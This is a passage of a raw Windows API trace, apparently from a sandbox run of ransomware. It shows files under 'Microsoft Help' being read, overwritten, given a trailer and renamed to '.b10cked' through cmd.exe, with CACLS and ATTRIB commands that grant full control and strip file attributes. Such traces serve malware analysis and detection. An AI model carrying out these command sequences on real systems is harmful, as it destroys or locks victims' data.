SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25a2 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.957] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x20ba [0195.957] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0196.043] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0196.043] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0196.043] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x25a2 [0196.043] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0196.043] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0196.044] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0196.044] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x25a2 [0196.044] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0196.044] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0196.044] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x12d0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x12d0, lpOverlapped=0x0) returned 1 [0196.048] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0196.048] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, 
lpNumberOfBytesWritten=0x12ec1c*=0x12d0, lpOverlapped=0x0) returned 1 [0196.048] SetFilePointer (in: hFile=0x120, lDistanceToMove=-4816, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x12d2 [0196.048] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x12d0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x12d0, lpOverlapped=0x0) returned 1 [0196.048] SetFilePointer (in: hFile=0x120, lDistanceToMove=-4816, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x12d2 [0196.048] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x12d0, lpOverlapped=0x0) returned 1 [0196.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MValidator.HxD", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0196.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MValidator.HxD", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx_1033_MValidator.HxD", lpUsedDefaultChar=0x0) returned 22 [0196.052] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x25a2 [0196.052] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0196.052] CloseHandle (hObject=0x120) returned 1 [0196.053] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft 
Help\\Hx_1033_MValidator.HxD", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD") returned 0x27 [0196.054] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0196.054] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbdc, dwThreadId=0xbf8)) returned 1 [0196.234] CloseHandle (hObject=0x1b4) returned 1 [0196.234] CloseHandle (hObject=0x120) returned 1 [0196.234] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0196.234] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0196.234] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0196.234] WaitForSingleObject 
(hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0196.234] ReleaseMutex (hMutex=0xf8) returned 1 [0196.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0196.234] ReleaseMutex (hMutex=0xf8) returned 1 [0196.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0196.234] ReleaseMutex (hMutex=0xf8) returned 1 [0196.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0196.234] ReleaseMutex (hMutex=0xf8) returned 1 [0196.234] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0196.234] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0196.234] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4 [0196.234] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0196.234] CloseHandle (hObject=0x120) returned 1 [0196.235] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0196.235] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0196.235] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft 
Help\\Hx_1033_MValidator.Lck\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbc0, dwThreadId=0xe18)) returned 1 [0196.236] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0197.250] CloseHandle (hObject=0x1b4) returned 1 [0197.250] CloseHandle (hObject=0x120) returned 1 [0197.251] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.251] ReleaseMutex (hMutex=0xf8) returned 1 [0197.251] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.251] ReleaseMutex (hMutex=0xf8) returned 1 [0197.251] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.251] ReleaseMutex (hMutex=0xf8) returned 1 [0197.251] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.251] ReleaseMutex (hMutex=0xf8) returned 1 [0197.253] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.253] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.254] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4 [0197.254] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.254] CloseHandle (hObject=0x120) returned 1 [0197.254] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.254] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.254] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.254] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.254] ReleaseMutex (hMutex=0xf8) returned 1 [0197.254] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.254] ReleaseMutex (hMutex=0xf8) returned 1 [0197.254] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.254] ReleaseMutex (hMutex=0xf8) returned 1 [0197.254] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.254] ReleaseMutex (hMutex=0xf8) returned 1 [0197.254] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.281] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25407085875) returned 1 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.282] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x146 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x146 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.283] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.284] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.285] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.285] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.285] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.14.1033.hxn", cchWideChar=20, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0197.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.EXCEL.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0197.289] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x146 [0197.289] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.289] CloseHandle (hObject=0x120) returned 1 [0197.290] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN") returned 0x27 [0197.290] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.291] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 